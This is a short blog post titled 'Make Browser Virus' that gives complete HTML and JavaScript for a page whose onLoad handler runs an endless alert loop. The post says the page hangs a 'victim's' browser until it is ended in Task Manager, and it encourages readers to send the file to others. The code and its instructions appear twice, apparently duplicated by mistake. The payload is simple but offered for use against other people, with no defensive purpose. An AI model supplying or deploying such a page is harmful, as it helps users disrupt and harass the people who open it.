Make Browser Virus (virus)
Now this one is html based, it will hang the victims PC with an endless loop. Write this code in notepad and save it as (whatevername).html
<HTML>
<HEAD>
<SCRIPT LANGUAGE=javascript>
var x = "never";
function killme() {
while (x == "never") {
alert("-write whatever you want-");
}
}
</SCRIPT>
</HEAD>
<BODY onLoad="killme()">
</BODY>
</HTML>
<HEAD>
<SCRIPT LANGUAGE=javascript>
var x = "never";
function killme() {
while (x == "never") {
alert("-write whatever you want-");
}
}
</SCRIPT>
</HEAD>
<BODY onLoad="killme()">
</BODY>
</HTML>
in the code under "write whatever you want" you can type your text...
*Remember to save it with .html in end*
Now anyone who opens the HTML will be Struck with repetition of your message ( what so ever you typed)
Now to stop it you have to go to "Task Manager" and end firefox, internet explorer, etc. (browser)...
Happy Techrusting...*Remember to save it with .html in end*
Now anyone who opens the HTML will be Struck with repetition of your message ( what so ever you typed)
Now to stop it you have to go to "Task Manager" and end firefox, internet explorer, etc. (browser)...



No comments:
Post a Comment